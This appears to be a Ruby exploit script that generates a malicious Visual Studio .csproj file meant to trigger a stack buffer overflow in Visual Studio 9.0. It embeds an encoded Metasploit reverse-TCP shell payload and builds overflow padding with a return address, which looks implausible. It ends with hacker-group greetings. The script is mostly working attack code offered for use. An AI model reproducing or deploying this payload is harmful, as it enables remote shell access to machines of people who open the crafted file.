MS Visual Studio 9.0 .csproj Buffer Overflow

`#!/usr/bin/ruby  
  
###  
# Title : MS Visual Studio 9.0 (.csproj) Stack Buffer Overflow  
# Author : KedAns-Dz  
# E-mail : [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Twitter page : twitter.com/kedans  
# Tested on : windows XP SP3 Français & Arabic  
# Target : Microsoft Visual Studio v 9.0 / CSharp Project /  
###  
  
# Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com   
  
#START SYSTEM /root@MSdos/ :   
system("title KedAns-Dz")  
system("color 1e")  
system("cls")  
def Usage()  
puts "\n\n\n[!] MS Visual Studio 9.0 (.csproj) \n"  
puts "[!] Stack Buffer Overflow \n"  
puts "[!] Author: KedAns-Dz \n"  
puts "[!] E-mail: [email protected] \n"  
end   
  
# Payload Parameter (http://www.metasploit.com)   
# windows/shell_reverse_tcp - 739 bytes  
# Encoder: x86/alpha_mixed  
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>  
payload =   
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" +  
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" +  
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" +  
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" +  
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +  
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" +  
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" +  
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" +  
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" +  
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" +  
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" +  
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" +  
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" +  
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" +  
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" +  
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" +  
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" +  
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" +  
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" +  
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" +  
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" +  
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" +  
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" +  
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" +  
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" +  
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" +  
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" +  
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" +  
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" +  
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" +  
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" +  
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" +  
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" +  
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" +  
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" +  
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" +  
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" +  
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" +  
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" +  
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" +  
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" +  
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" +  
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" +  
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" +  
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" +  
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" +  
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" +  
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" +  
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" +  
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" +  
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" +  
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" +  
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41" #_ End Payload _  
  
# Parameter OverFlow =>   
amt = "A" * 333 + "-"  
bmt = "B" * 333 + "-"  
cmt = "C" * 333  
buff = amt + bmt + cmt # Buffer GID  
ret = [0x000004b0].pack('V') # Jump to ESP - from MSVS.ORDesigner.DslPackage.dll  
junk = "\x4b" * 500 # junk   
padd = "\x90" * 30 # Padding  
# KedAns = [Payload_shell][RET: 0x000004b0][Padding][Junk]  
KedAns = payload + ret + padd + junk   
  
# Parameter Evil File =>  
ked = %Q{<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="3.5">  
<PropertyGroup>  
  
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>  
  
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>  
  
<SchemaVersion>2.0</SchemaVersion>  
  
<ProjectGuid>{#{buff}}</ProjectGuid>  
  
<OutputType>Library</OutputType>  
  
<StartupObject>  
#{junk}  
</StartupObject>  
  
</PropertyGroup>  
  
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">  
  
<DebugSymbols>true</DebugSymbols>  
  
<Optimize>false</Optimize>  
  
<OutputPath>.\bin\Debug\</OutputPath>  
  
</PropertyGroup>  
<ItemGroup>  
<Reference Include="System"/>  
  
<Reference Include="#{KedAns}"/>  
  
</ItemGroup>  
  
<Compile Include="KedAns-Dz.cs">  
<SubType>Code</SubType>  
</Compile>  
</ItemGroup>  
</Project>  
} # _ End Parameter File _  
# >> Creating ...   
evil = File.new("KedAns.csproj","wb") # Evil file (CSharp.Project)  
evil.write(ked)  
evil.close  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================  
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One  
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;  
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <  
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others  
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...  
# sec4ever.com members Dz : =>>  
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others  
# hotturks.org : TeX * KadaVra ... all Others  
# Kelvin.Xgr ( kelvinx.net)  
#===========================================================================  
`